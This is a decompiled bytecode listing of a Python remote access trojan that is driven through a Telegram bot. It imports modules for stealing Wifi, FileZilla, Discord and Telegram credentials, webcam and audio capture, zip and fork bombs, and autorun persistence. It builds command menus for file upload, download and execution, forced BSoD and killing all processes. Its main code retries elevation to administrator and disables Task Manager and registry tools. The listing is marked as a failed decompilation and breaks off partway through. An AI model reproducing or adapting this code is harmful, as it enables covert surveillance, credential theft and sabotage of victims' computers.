
# file test/102712.pyc
# --- This code section failed: ---

 L.   1         0  LOAD_CONST               0
                2  LOAD_CONST               ('*',)
                4  IMPORT_NAME              RAT
                6  IMPORT_STAR      

 L.   3         8  LOAD_CONST               0
               10  LOAD_CONST               ('*',)
               12  IMPORT_NAME_ATTR         Core.Settings.Organization
               14  IMPORT_STAR      

 L.   4        16  LOAD_CONST               0
               18  LOAD_CONST               ('*',)
               20  IMPORT_NAME_ATTR         Core.Settings.Antivirus
               22  IMPORT_STAR      

 L.   5        24  LOAD_CONST               0
               26  LOAD_CONST               ('*',)
               28  IMPORT_NAME_ATTR         Core.Settings.Admin
               30  IMPORT_STAR      

 L.   6        32  LOAD_CONST               0
               34  LOAD_CONST               ('*',)
               36  IMPORT_NAME_ATTR         Core.Settings.CriticalProcess
               38  IMPORT_STAR      

 L.   7        40  LOAD_CONST               0
               42  LOAD_CONST               ('*',)
               44  IMPORT_NAME_ATTR         Core.Settings.MessageBox
               46  IMPORT_STAR      

 L.   9        48  LOAD_CONST               0
               50  LOAD_CONST               ('*',)
               52  IMPORT_NAME_ATTR         Core.Network.Information
               54  IMPORT_STAR      

 L.  10        56  LOAD_CONST               0
               58  LOAD_CONST               ('*',)
               60  IMPORT_NAME_ATTR         Core.Network.Location
               62  IMPORT_STAR      

 L.  12        64  LOAD_CONST               0
               66  LOAD_CONST               ('*',)
               68  IMPORT_NAME_ATTR         Core.Main.Screen
               70  IMPORT_STAR      

 L.  13        72  LOAD_CONST               0
               74  LOAD_CONST               ('*',)
               76  IMPORT_NAME_ATTR         Core.Main.Webcam
               78  IMPORT_STAR      

 L.  14        80  LOAD_CONST               0
               82  LOAD_CONST               ('*',)
               84  IMPORT_NAME_ATTR         Core.Main.Audio
               86  IMPORT_STAR      

 L.  15        88  LOAD_CONST               0
               90  LOAD_CONST               ('*',)
               92  IMPORT_NAME_ATTR         Core.Main.Power
               94  IMPORT_STAR      

 L.  16        96  LOAD_CONST               0
               98  LOAD_CONST               ('*',)
              100  IMPORT_NAME_ATTR         Core.Main.Autorun
              102  IMPORT_STAR      

 L.  18       104  LOAD_CONST               0
              106  LOAD_CONST               ('*',)
              108  IMPORT_NAME_ATTR         Core.Files.Tasklist
              110  IMPORT_STAR      

 L.  19       112  LOAD_CONST               0
              114  LOAD_CONST               ('*',)
              116  IMPORT_NAME_ATTR         Core.Files.Taskkill
              118  IMPORT_STAR      

 L.  21       120  LOAD_CONST               0
              122  LOAD_CONST               ('*',)
              124  IMPORT_NAME_ATTR         Core.Fun.Message
              126  IMPORT_STAR      

 L.  22       128  LOAD_CONST               0
              130  LOAD_CONST               ('*',)
              132  IMPORT_NAME_ATTR         Core.Fun.Speak
              134  IMPORT_STAR      

 L.  23       136  LOAD_CONST               0
              138  LOAD_CONST               ('*',)
              140  IMPORT_NAME_ATTR         Core.Fun.OpenURL
              142  IMPORT_STAR      

 L.  24       144  LOAD_CONST               0
              146  LOAD_CONST               ('*',)
              148  IMPORT_NAME_ATTR         Core.Fun.Wallpapers
              150  IMPORT_STAR      

 L.  26       152  LOAD_CONST               0
              154  LOAD_CONST               ('*',)
              156  IMPORT_NAME_ATTR         Core.Bomb.ZipBomb
              158  IMPORT_STAR      

 L.  27       160  LOAD_CONST               0
              162  LOAD_CONST               ('*',)
              164  IMPORT_NAME_ATTR         Core.Bomb.ForkBomb
              166  IMPORT_STAR      

 L.  29       168  LOAD_CONST               0
              170  LOAD_CONST               ('*',)
              172  IMPORT_NAME_ATTR         Core.Stealer.Wifi
              174  IMPORT_STAR      

 L.  30       176  LOAD_CONST               0
              178  LOAD_CONST               ('*',)
              180  IMPORT_NAME_ATTR         Core.Stealer.FileZilla
              182  IMPORT_STAR      

 L.  31       184  LOAD_CONST               0
              186  LOAD_CONST               ('*',)
              188  IMPORT_NAME_ATTR         Core.Stealer.Discord
              190  IMPORT_STAR      

 L.  32       192  LOAD_CONST               0
              194  LOAD_CONST               ('*',)
              196  IMPORT_NAME_ATTR         Core.Stealer.Telegram
              198  IMPORT_STAR      

 L.  34       200  LOAD_CONST               0
              202  LOAD_CONST               ('*',)
              204  IMPORT_NAME_ATTR         Core.Other.Clipboard
              206  IMPORT_STAR      

 L.  35       208  LOAD_CONST               0
              210  LOAD_CONST               ('*',)
              212  IMPORT_NAME_ATTR         Core.Other.SendKeys
              214  IMPORT_STAR      

 L.  36       216  LOAD_CONST               0
              218  LOAD_CONST               ('*',)
              220  IMPORT_NAME_ATTR         Core.Other.Monitor
              222  IMPORT_STAR      

 L.  37       224  LOAD_CONST               0
              226  LOAD_CONST               ('*',)
              228  IMPORT_NAME_ATTR         Core.Other.Volume
              230  IMPORT_STAR      

 L.  38       232  LOAD_CONST               0
              234  LOAD_CONST               ('*',)
              236  IMPORT_NAME_ATTR         Core.Other.Rotate
              238  IMPORT_STAR      

 L.  39       240  LOAD_CONST               0
              242  LOAD_CONST               ('*',)
              244  IMPORT_NAME_ATTR         Core.Other.Freeze
              246  IMPORT_STAR      

 L.  40       248  LOAD_CONST               0
              250  LOAD_CONST               ('*',)
              252  IMPORT_NAME_ATTR         Core.Other.DVD
              254  IMPORT_STAR      

 L.  42       256  LOAD_CONST               0
              258  LOAD_CONST               None
              260  IMPORT_NAME              telebot
              262  STORE_NAME               telebot

 L.  44       264  LOAD_NAME                telebot
              266  LOAD_ATTR                TeleBot
              268  LOAD_NAME                TelegramToken
              270  LOAD_CONST               True
              272  LOAD_CONST               ('threaded',)
              274  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              276  STORE_NAME               bot

 L.  45       278  LOAD_NAME                telebot
              280  LOAD_ATTR                util
              282  LOAD_ATTR                ThreadPool
              284  LOAD_CONST               50
              286  LOAD_CONST               ('num_threads',)
              288  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'
              290  LOAD_NAME                bot
              292  STORE_ATTR               worker_pool

 L.  47       294  LOAD_NAME                telebot
              296  LOAD_ATTR                types
              298  LOAD_METHOD              ReplyKeyboardMarkup
              300  CALL_METHOD_0         0  ''
              302  STORE_NAME               menu

 L.  48       304  LOAD_NAME                telebot
              306  LOAD_ATTR                types
              308  LOAD_METHOD              KeyboardButton
              310  LOAD_STR                 '/1\n<<'
              312  CALL_METHOD_1         1  ''
              314  STORE_NAME               button1

 L.  49       316  LOAD_NAME                telebot
              318  LOAD_ATTR                types
              320  LOAD_METHOD              KeyboardButton
              322  LOAD_STR                 '/2\n>>'
              324  CALL_METHOD_1         1  ''
              326  STORE_NAME               button2

 L.  50       328  LOAD_NAME                telebot
              330  LOAD_ATTR                types
              332  LOAD_METHOD              KeyboardButton
              334  LOAD_STR                 '/Screen\n🖼'
              336  CALL_METHOD_1         1  ''
              338  STORE_NAME               button3

 L.  51       340  LOAD_NAME                telebot
              342  LOAD_ATTR                types
              344  LOAD_METHOD              KeyboardButton
              346  LOAD_STR                 '/Webcam\n📸'
              348  CALL_METHOD_1         1  ''
              350  STORE_NAME               button4

 L.  52       352  LOAD_NAME                telebot
              354  LOAD_ATTR                types
              356  LOAD_METHOD              KeyboardButton
              358  LOAD_STR                 '/Audio\n🎙'
              360  CALL_METHOD_1         1  ''
              362  STORE_NAME               button5

 L.  53       364  LOAD_NAME                telebot
              366  LOAD_ATTR                types
              368  LOAD_METHOD              KeyboardButton
              370  LOAD_STR                 '/Power\n🔴'
              372  CALL_METHOD_1         1  ''
              374  STORE_NAME               button6

 L.  54       376  LOAD_NAME                telebot
              378  LOAD_ATTR                types
              380  LOAD_METHOD              KeyboardButton
              382  LOAD_STR                 '/Autorun\n🔵'
              384  CALL_METHOD_1         1  ''
              386  STORE_NAME               button7

 L.  55       388  LOAD_NAME                menu
              390  LOAD_METHOD              row
              392  LOAD_NAME                button1
              394  LOAD_NAME                button3
              396  LOAD_NAME                button2
              398  CALL_METHOD_3         3  ''
              400  POP_TOP          

 L.  56       402  LOAD_NAME                menu
              404  LOAD_METHOD              row
              406  LOAD_NAME                button4
              408  LOAD_NAME                button5
              410  CALL_METHOD_2         2  ''
              412  POP_TOP          

 L.  57       414  LOAD_NAME                menu
              416  LOAD_METHOD              row
              418  LOAD_NAME                button6
              420  LOAD_NAME                button7
              422  CALL_METHOD_2         2  ''
              424  POP_TOP          

 L.  59       426  LOAD_NAME                telebot
              428  LOAD_ATTR                types
              430  LOAD_METHOD              InlineKeyboardMarkup
              432  CALL_METHOD_0         0  ''
              434  STORE_NAME               main2

 L.  60       436  LOAD_NAME                telebot
              438  LOAD_ATTR                types
              440  LOAD_ATTR                InlineKeyboardButton
              442  LOAD_STR                 'Hibernate - 🛑'
              444  LOAD_STR                 'hibernate'
              446  LOAD_CONST               ('callback_data',)
              448  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              450  STORE_NAME               button1

 L.  61       452  LOAD_NAME                telebot
              454  LOAD_ATTR                types
              456  LOAD_ATTR                InlineKeyboardButton
              458  LOAD_STR                 'Shutdown - ⛔️'
              460  LOAD_STR                 'shutdown'
              462  LOAD_CONST               ('callback_data',)
              464  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              466  STORE_NAME               button2

 L.  62       468  LOAD_NAME                telebot
              470  LOAD_ATTR                types
              472  LOAD_ATTR                InlineKeyboardButton
              474  LOAD_STR                 'Restart - ⭕️'
              476  LOAD_STR                 'restart'
              478  LOAD_CONST               ('callback_data',)
              480  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              482  STORE_NAME               button3

 L.  63       484  LOAD_NAME                telebot
              486  LOAD_ATTR                types
              488  LOAD_ATTR                InlineKeyboardButton
              490  LOAD_STR                 'Logoff - 💢'
              492  LOAD_STR                 'logoff'
              494  LOAD_CONST               ('callback_data',)
              496  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              498  STORE_NAME               button4

 L.  64       500  LOAD_NAME                telebot
              502  LOAD_ATTR                types
              504  LOAD_ATTR                InlineKeyboardButton
              506  LOAD_STR                 'BSoD - 🌀'
              508  LOAD_STR                 'bsod'
              510  LOAD_CONST               ('callback_data',)
              512  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              514  STORE_NAME               button5

 L.  65       516  LOAD_NAME                telebot
              518  LOAD_ATTR                types
              520  LOAD_ATTR                InlineKeyboardButton
              522  LOAD_STR                 '« Back'
              524  LOAD_STR                 'cancel'
              526  LOAD_CONST               ('callback_data',)
              528  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              530  STORE_NAME               button6

 L.  66       532  LOAD_NAME                main2
              534  LOAD_METHOD              row
              536  LOAD_NAME                button1
              538  CALL_METHOD_1         1  ''
              540  POP_TOP          

 L.  67       542  LOAD_NAME                main2
              544  LOAD_METHOD              row
              546  LOAD_NAME                button2
              548  CALL_METHOD_1         1  ''
              550  POP_TOP          

 L.  68       552  LOAD_NAME                main2
              554  LOAD_METHOD              row
              556  LOAD_NAME                button3
              558  CALL_METHOD_1         1  ''
              560  POP_TOP          

 L.  69       562  LOAD_NAME                main2
              564  LOAD_METHOD              row
              566  LOAD_NAME                button4
              568  CALL_METHOD_1         1  ''
              570  POP_TOP          

 L.  70       572  LOAD_NAME                main2
              574  LOAD_METHOD              row
              576  LOAD_NAME                button5
              578  CALL_METHOD_1         1  ''
              580  POP_TOP          

 L.  71       582  LOAD_NAME                main2
              584  LOAD_METHOD              row
              586  LOAD_NAME                button6
              588  CALL_METHOD_1         1  ''
              590  POP_TOP          

 L.  73       592  LOAD_NAME                telebot
              594  LOAD_ATTR                types
              596  LOAD_METHOD              InlineKeyboardMarkup
              598  CALL_METHOD_0         0  ''
              600  STORE_NAME               main3

 L.  74       602  LOAD_NAME                telebot
              604  LOAD_ATTR                types
              606  LOAD_ATTR                InlineKeyboardButton
              608  LOAD_STR                 'Add to Startup - 📥'
              610  LOAD_STR                 'startup'
              612  LOAD_CONST               ('callback_data',)
              614  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              616  STORE_NAME               button1

 L.  75       618  LOAD_NAME                telebot
              620  LOAD_ATTR                types
              622  LOAD_ATTR                InlineKeyboardButton
              624  LOAD_STR                 'Uninstall - ♻️'
              626  LOAD_STR                 'confirm'
              628  LOAD_CONST               ('callback_data',)
              630  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              632  STORE_NAME               button2

 L.  76       634  LOAD_NAME                telebot
              636  LOAD_ATTR                types
              638  LOAD_ATTR                InlineKeyboardButton
              640  LOAD_STR                 '« Back'
              642  LOAD_STR                 'cancel'
              644  LOAD_CONST               ('callback_data',)
              646  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              648  STORE_NAME               button3

 L.  77       650  LOAD_NAME                main3
              652  LOAD_METHOD              row
              654  LOAD_NAME                button1
              656  CALL_METHOD_1         1  ''
              658  POP_TOP          

 L.  78       660  LOAD_NAME                main3
              662  LOAD_METHOD              row
              664  LOAD_NAME                button2
              666  CALL_METHOD_1         1  ''
              668  POP_TOP          

 L.  79       670  LOAD_NAME                main3
              672  LOAD_METHOD              row
              674  LOAD_NAME                button3
              676  CALL_METHOD_1         1  ''
              678  POP_TOP          

 L.  81       680  LOAD_NAME                telebot
              682  LOAD_ATTR                types
              684  LOAD_METHOD              InlineKeyboardMarkup
              686  CALL_METHOD_0         0  ''
              688  STORE_NAME               main4

 L.  82       690  LOAD_NAME                telebot
              692  LOAD_ATTR                types
              694  LOAD_ATTR                InlineKeyboardButton
              696  LOAD_STR                 'Yes, im sure!'
              698  LOAD_STR                 'uninstall'
              700  LOAD_CONST               ('callback_data',)
              702  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              704  STORE_NAME               button1

 L.  83       706  LOAD_NAME                telebot
              708  LOAD_ATTR                types
              710  LOAD_ATTR                InlineKeyboardButton
              712  LOAD_STR                 'Hell no!'
              714  LOAD_STR                 'cancel'
              716  LOAD_CONST               ('callback_data',)
              718  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              720  STORE_NAME               button2

 L.  84       722  LOAD_NAME                telebot
              724  LOAD_ATTR                types
              726  LOAD_ATTR                InlineKeyboardButton
              728  LOAD_STR                 '« Back'
              730  LOAD_STR                 'cancel'
              732  LOAD_CONST               ('callback_data',)
              734  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              736  STORE_NAME               button3

 L.  85       738  LOAD_NAME                main4
              740  LOAD_METHOD              row
              742  LOAD_NAME                button1
              744  CALL_METHOD_1         1  ''
              746  POP_TOP          

 L.  86       748  LOAD_NAME                main4
              750  LOAD_METHOD              row
              752  LOAD_NAME                button2
              754  CALL_METHOD_1         1  ''
              756  POP_TOP          

 L.  87       758  LOAD_NAME                main4
              760  LOAD_METHOD              row
              762  LOAD_NAME                button3
              764  CALL_METHOD_1         1  ''
              766  POP_TOP          

 L.  89       768  LOAD_NAME                telebot
              770  LOAD_ATTR                types
              772  LOAD_METHOD              ReplyKeyboardMarkup
              774  CALL_METHOD_0         0  ''
              776  STORE_NAME               main5

 L.  90       778  LOAD_NAME                telebot
              780  LOAD_ATTR                types
              782  LOAD_METHOD              KeyboardButton
              784  LOAD_STR                 '/3\n<<'
              786  CALL_METHOD_1         1  ''
              788  STORE_NAME               button1

 L.  91       790  LOAD_NAME                telebot
              792  LOAD_ATTR                types
              794  LOAD_METHOD              KeyboardButton
              796  LOAD_STR                 '/4\n>>'
              798  CALL_METHOD_1         1  ''
              800  STORE_NAME               button2

 L.  92       802  LOAD_NAME                telebot
              804  LOAD_ATTR                types
              806  LOAD_METHOD              KeyboardButton
              808  LOAD_STR                 '/Screen\n🖼'
              810  CALL_METHOD_1         1  ''
              812  STORE_NAME               button3

 L.  93       814  LOAD_NAME                telebot
              816  LOAD_ATTR                types
              818  LOAD_METHOD              KeyboardButton
              820  LOAD_STR                 '/Files\n💾'
              822  CALL_METHOD_1         1  ''
              824  STORE_NAME               button4

 L.  94       826  LOAD_NAME                telebot
              828  LOAD_ATTR                types
              830  LOAD_METHOD              KeyboardButton
              832  LOAD_STR                 '/Tasklist\n📋'
              834  CALL_METHOD_1         1  ''
              836  STORE_NAME               button5

 L.  95       838  LOAD_NAME                telebot
              840  LOAD_ATTR                types
              842  LOAD_METHOD              KeyboardButton
              844  LOAD_STR                 '/Taskkill\n📝'
              846  CALL_METHOD_1         1  ''
              848  STORE_NAME               button6

 L.  96       850  LOAD_NAME                main5
              852  LOAD_METHOD              row
              854  LOAD_NAME                button1
              856  LOAD_NAME                button3
              858  LOAD_NAME                button2
              860  CALL_METHOD_3         3  ''
              862  POP_TOP          

 L.  97       864  LOAD_NAME                main5
              866  LOAD_METHOD              row
              868  LOAD_NAME                button4
              870  CALL_METHOD_1         1  ''
              872  POP_TOP          

 L.  98       874  LOAD_NAME                main5
              876  LOAD_METHOD              row
              878  LOAD_NAME                button5
              880  LOAD_NAME                button6
              882  CALL_METHOD_2         2  ''
              884  POP_TOP          

 L. 100       886  LOAD_NAME                telebot
              888  LOAD_ATTR                types
              890  LOAD_METHOD              InlineKeyboardMarkup
              892  CALL_METHOD_0         0  ''
              894  STORE_NAME               main6

 L. 101       896  LOAD_NAME                telebot
              898  LOAD_ATTR                types
              900  LOAD_ATTR                InlineKeyboardButton
              902  LOAD_STR                 'Kill all Processes'
              904  LOAD_STR                 'taskkill all'
              906  LOAD_CONST               ('callback_data',)
              908  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              910  STORE_NAME               button1

 L. 102       912  LOAD_NAME                telebot
              914  LOAD_ATTR                types
              916  LOAD_ATTR                InlineKeyboardButton
              918  LOAD_STR                 'Disable Task Manager'
              920  LOAD_STR                 'disabletaskmgr'
              922  LOAD_CONST               ('callback_data',)
              924  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              926  STORE_NAME               button2

 L. 103       928  LOAD_NAME                main6
              930  LOAD_METHOD              row
              932  LOAD_NAME                button1
              934  CALL_METHOD_1         1  ''
              936  POP_TOP          

 L. 104       938  LOAD_NAME                main6
              940  LOAD_METHOD              row
              942  LOAD_NAME                button2
              944  CALL_METHOD_1         1  ''
              946  POP_TOP          

 L. 106       948  LOAD_NAME                telebot
              950  LOAD_ATTR                types
              952  LOAD_METHOD              ReplyKeyboardMarkup
              954  CALL_METHOD_0         0  ''
              956  STORE_NAME               main7

 L. 107       958  LOAD_NAME                telebot
              960  LOAD_ATTR                types
              962  LOAD_METHOD              KeyboardButton
              964  LOAD_STR                 '/CD\n🗂'
              966  CALL_METHOD_1         1  ''
              968  STORE_NAME               button1

 L. 108       970  LOAD_NAME                telebot
              972  LOAD_ATTR                types
              974  LOAD_METHOD              KeyboardButton
              976  LOAD_STR                 '/Upload\n📡'
              978  CALL_METHOD_1         1  ''
              980  STORE_NAME               button2

 L. 109       982  LOAD_NAME                telebot
              984  LOAD_ATTR                types
              986  LOAD_METHOD              KeyboardButton
              988  LOAD_STR                 '/ls\n📄'
              990  CALL_METHOD_1         1  ''
              992  STORE_NAME               button3

 L. 110       994  LOAD_NAME                telebot
              996  LOAD_ATTR                types
              998  LOAD_METHOD              KeyboardButton
             1000  LOAD_STR                 '/Remove\n🗑'
             1002  CALL_METHOD_1         1  ''
             1004  STORE_NAME               button4

 L. 111      1006  LOAD_NAME                telebot
             1008  LOAD_ATTR                types
             1010  LOAD_METHOD              KeyboardButton
             1012  LOAD_STR                 '/Download\n📨'
             1014  CALL_METHOD_1         1  ''
             1016  STORE_NAME               button5

 L. 112      1018  LOAD_NAME                telebot
             1020  LOAD_ATTR                types
             1022  LOAD_METHOD              KeyboardButton
             1024  LOAD_STR                 '/Run\n📌'
             1026  CALL_METHOD_1         1  ''
             1028  STORE_NAME               button6

 L. 113      1030  LOAD_NAME                telebot
             1032  LOAD_ATTR                types
             1034  LOAD_METHOD              KeyboardButton
             1036  LOAD_STR                 '/Cancel'
             1038  CALL_METHOD_1         1  ''
             1040  STORE_NAME               button7

 L. 114      1042  LOAD_NAME                main7
             1044  LOAD_METHOD              row
             1046  LOAD_NAME                button1
             1048  LOAD_NAME                button2
             1050  LOAD_NAME                button3
             1052  CALL_METHOD_3         3  ''
             1054  POP_TOP          

 L. 115      1056  LOAD_NAME                main7
             1058  LOAD_METHOD              row
             1060  LOAD_NAME                button4
             1062  LOAD_NAME                button5
             1064  LOAD_NAME                button6
             1066  CALL_METHOD_3         3  ''
             1068  POP_TOP          

 L. 116      1070  LOAD_NAME                main7
             1072  LOAD_METHOD              row
             1074  LOAD_NAME                button7
             1076  CALL_METHOD_1         1  ''
             1078  POP_TOP          

 L. 118      1080  LOAD_NAME                telebot
             1082  LOAD_ATTR                types
             1084  LOAD_METHOD              ReplyKeyboardMarkup
             1086  CALL_METHOD_0         0  ''
             1088  STORE_NAME               main8

 L. 119      1090  LOAD_NAME                telebot
             1092  LOAD_ATTR                types
             1094  LOAD_METHOD              KeyboardButton
             1096  LOAD_STR                 '/5\n<<'
             1098  CALL_METHOD_1         1  ''
             1100  STORE_NAME               button1

 L. 120      1102  LOAD_NAME                telebot
             1104  LOAD_ATTR                types
             1106  LOAD_METHOD              KeyboardButton
             1108  LOAD_STR                 '/6\n>>'
             1110  CALL_METHOD_1         1  ''
             1112  STORE_NAME               button2

 L. 121      1114  LOAD_NAME                telebot
             1116  LOAD_ATTR                types
             1118  LOAD_METHOD              KeyboardButton
             1120  LOAD_STR                 '/Screen\n🖼'
             1122  CALL_METHOD_1         1  ''
             1124  STORE_NAME               button3

 L. 122      1126  LOAD_NAME                telebot
             1128  LOAD_ATTR                types
             1130  LOAD_METHOD              KeyboardButton
             1132  LOAD_STR                 '/Message\n💬'
             1134  CALL_METHOD_1         1  ''
             1136  STORE_NAME               button4

 L. 123      1138  LOAD_NAME                telebot
             1140  LOAD_ATTR                types
             1142  LOAD_METHOD              KeyboardButton
             1144  LOAD_STR                 '/Speak\n📢'
             1146  CALL_METHOD_1         1  ''
             1148  STORE_NAME               button5

 L. 124      1150  LOAD_NAME                telebot
             1152  LOAD_ATTR                types
             1154  LOAD_METHOD              KeyboardButton
             1156  LOAD_STR                 '/OpenURL\n🌐'
             1158  CALL_METHOD_1         1  ''
             1160  STORE_NAME               button6

 L. 125      1162  LOAD_NAME                telebot
             1164  LOAD_ATTR                types
             1166  LOAD_METHOD              KeyboardButton
             1168  LOAD_STR                 '/Wallpapers\n🧩'
             1170  CALL_METHOD_1         1  ''
             1172  STORE_NAME               button7

 L. 126      1174  LOAD_NAME                main8
             1176  LOAD_METHOD              row
             1178  LOAD_NAME                button1
             1180  LOAD_NAME                button3
             1182  LOAD_NAME                button2
             1184  CALL_METHOD_3         3  ''
             1186  POP_TOP          

 L. 127      1188  LOAD_NAME                main8
             1190  LOAD_METHOD              row
             1192  LOAD_NAME                button4
             1194  LOAD_NAME                button5
             1196  CALL_METHOD_2         2  ''
             1198  POP_TOP          

 L. 128      1200  LOAD_NAME                main8
             1202  LOAD_METHOD              row
             1204  LOAD_NAME                button6
             1206  LOAD_NAME                button7
             1208  CALL_METHOD_2         2  ''
             1210  POP_TOP          

 L. 133      1212  LOAD_NAME                os
             1214  LOAD_ATTR                path
             1216  LOAD_METHOD              basename
             1218  LOAD_NAME                sys
             1220  LOAD_ATTR                argv
             1222  LOAD_CONST               0
             1224  BINARY_SUBSCR    
             1226  CALL_METHOD_1         1  ''
             1228  STORE_NAME               CurrentName

 L. 134      1230  LOAD_NAME                sys
             1232  LOAD_ATTR                argv
             1234  LOAD_CONST               0
             1236  BINARY_SUBSCR    
             1238  STORE_NAME               CurrentPath

 L. 137      1240  LOAD_NAME                Directory

 L. 138      1242  LOAD_NAME                Directory
             1244  LOAD_STR                 'Documents'
             1246  BINARY_ADD       

 L. 139      1248  LOAD_NAME                Directory
             1250  LOAD_STR                 'Photos'
             1252  BINARY_ADD       

 L. 136      1254  BUILD_LIST_3          3 
             1256  STORE_NAME               RAT

 L. 142      1258  LOAD_NAME                RAT
             1260  GET_ITER         
           1262_0  COME_FROM          1276  '1276'
             1262  FOR_ITER           1294  'to 1294'
             1264  STORE_NAME               Directories

 L. 144      1266  LOAD_NAME                os
             1268  LOAD_ATTR                path
             1270  LOAD_METHOD              exists
             1272  LOAD_NAME                Directories
             1274  CALL_METHOD_1         1  ''
         1276_1278  POP_JUMP_IF_TRUE   1262  'to 1262'

 L. 145      1280  LOAD_NAME                os
             1282  LOAD_METHOD              makedirs
             1284  LOAD_NAME                Directories
             1286  CALL_METHOD_1         1  ''
             1288  POP_TOP          
         1290_1292  JUMP_BACK          1262  'to 1262'

 L. 150      1294  LOAD_NAME                AdminRightsRequired
             1296  LOAD_CONST               True
             1298  <117>                 0  ''
         1300_1302  POP_JUMP_IF_FALSE  1382  'to 1382'

 L. 152      1304  LOAD_NAME                Admin
             1306  CALL_FUNCTION_0       0  ''
             1308  LOAD_CONST               False
             1310  <117>                 0  ''
         1312_1314  POP_JUMP_IF_FALSE  1382  'to 1382'

 L. 154      1316  SETUP_FINALLY      1342  'to 1342'

 L. 155      1318  LOAD_NAME                print
             1320  LOAD_STR                 '[~] › Trying elevate previleges to administrator\n'
             1322  CALL_FUNCTION_1       1  ''
             1324  POP_TOP          

 L. 156      1326  LOAD_NAME                os
             1328  LOAD_METHOD              startfile
             1330  LOAD_NAME                CurrentPath
             1332  LOAD_STR                 'runas'
             1334  CALL_METHOD_2         2  ''
             1336  POP_TOP          
             1338  POP_BLOCK        
             1340  JUMP_FORWARD       1354  'to 1354'
           1342_0  COME_FROM_FINALLY  1316  '1316'

 L. 157      1342  POP_TOP          
             1344  POP_TOP          
             1346  POP_TOP          

 L. 158      1348  POP_EXCEPT       
             1350  JUMP_BACK          1316  'to 1316'
             1352  <48>             
           1354_0  COME_FROM          1340  '1340'

 L. 160      1354  LOAD_NAME                print
             1356  LOAD_STR                 '[+] › '
             1358  LOAD_NAME                CurrentName
             1360  BINARY_ADD       
             1362  LOAD_STR                 ' opened as admin rights\n'
             1364  BINARY_ADD       
             1366  CALL_FUNCTION_1       1  ''
             1368  POP_TOP          

 L. 161      1370  LOAD_NAME                sys
             1372  LOAD_METHOD              exit
             1374  CALL_METHOD_0         0  ''
             1376  POP_TOP          
         1378_1380  JUMP_BACK          1316  'to 1316'
           1382_0  COME_FROM          1312  '1312'
           1382_1  COME_FROM          1300  '1300'

 L. 166      1382  LOAD_NAME                DisableTaskManager
             1384  LOAD_CONST               True
             1386  <117>                 0  ''
         1388_1390  POP_JUMP_IF_FALSE  1484  'to 1484'

 L. 168      1392  LOAD_NAME                os
             1394  LOAD_ATTR                path
             1396  LOAD_METHOD              exists
             1398  LOAD_NAME                Directory
             1400  LOAD_STR                 'RegeditDisableTaskManager'
             1402  BINARY_ADD       
             1404  CALL_METHOD_1         1  ''
         1406_1408  POP_JUMP_IF_FALSE  1420  'to 1420'

 L. 169      1410  LOAD_NAME                print
             1412  LOAD_STR                 '[+] › taskmgr.exe is already disabled\n'
             1414  CALL_FUNCTION_1       1  ''
             1416  POP_TOP          
             1418  JUMP_FORWARD       1484  'to 1484'
           1420_0  COME_FROM          1406  '1406'

 L. 172      1420  LOAD_NAME                Admin
             1422  CALL_FUNCTION_0       0  ''
             1424  LOAD_CONST               False
             1426  <117>                 0  ''
         1428_1430  POP_JUMP_IF_FALSE  1440  'to 1440'

 L. 173      1432  LOAD_NAME                print
             1434  LOAD_STR                 '[-] › This function requires admin rights\n'
             1436  CALL_FUNCTION_1       1  ''
             1438  POP_TOP          
           1440_0  COME_FROM          1428  '1428'

 L. 175      1440  LOAD_NAME                Admin
             1442  CALL_FUNCTION_0       0  ''
             1444  LOAD_CONST               True
             1446  <117>                 0  ''
         1448_1450  POP_JUMP_IF_FALSE  1484  'to 1484'

 L. 176      1452  LOAD_NAME                RegeditDisableTaskManager
             1454  CALL_FUNCTION_0       0  ''
             1456  POP_TOP          

 L. 177      1458  LOAD_NAME                open
             1460  LOAD_NAME                Directory
             1462  LOAD_STR                 'RegeditDisableTaskManager'
             1464  BINARY_ADD       
             1466  LOAD_STR                 'a'
             1468  CALL_FUNCTION_2       2  ''
             1470  LOAD_METHOD              close
             1472  CALL_METHOD_0         0  ''
             1474  POP_TOP          

 L. 178      1476  LOAD_NAME                print
             1478  LOAD_STR                 '[+] › taskmgr.exe has been disabled\n'
             1480  CALL_FUNCTION_1       1  ''
             1482  POP_TOP          
           1484_0  COME_FROM          1448  '1448'
           1484_1  COME_FROM          1418  '1418'
           1484_2  COME_FROM          1388  '1388'

 L. 183      1484  LOAD_NAME                DisableRegistryTools
             1486  LOAD_CONST               True
             1488  <117>                 0  ''
         1490_1492  POP_JUMP_IF_FALSE  1586  'to 1586'

 L. 185      1494  LOAD_NAME                os
             1496  LOAD_ATTR                path
             1498  LOAD_METHOD              exists
             1500  LOAD_NAME                Directory
             1502  LOAD_STR                 'RegeditDisableRegistryTools'
             1504  BINARY_ADD       
             1506  CALL_METHOD_1         1  ''
         1508_1510  POP_JUMP_IF_FALSE  1522  'to 1522'

 L. 186      1512  LOAD_NAME                print
             1514  LOAD_STR                 '[+] › regedit.exe is already disabled\n'
             1516  CALL_FUNCTION_1       1  ''
             1518  POP_TOP          
             1520  JUMP_FORWARD       1586  'to 1586'
           1522_0  COME_FROM          1508  '1508'

 L. 189      1522  LOAD_NAME                Admin
             1524  CALL_FUNCTION_0       0  ''
             1526  LOAD_CONST               False
             1528  <117>                 0  ''
         1530_1532  POP_JUMP_IF_FALSE  1542  'to 1542'

 L. 190      1534  LOAD_NAME                print
             1536  LOAD_STR                 '[-] › This function requires admin rights\n'
             1538  CALL_FUNCTION_1       1  ''
             1540  POP_TOP          
           1542_0  COME_FROM          1530  '1530'

 L. 192      1542  LOAD_NAME                Admin
             1544  CALL_FUNCTION_0       0  ''
             1546  LOAD_CONST               True
             1548  <117>                 0  ''
         1550_1552  POP_JUMP_IF_FALSE  1586  'to 1586'

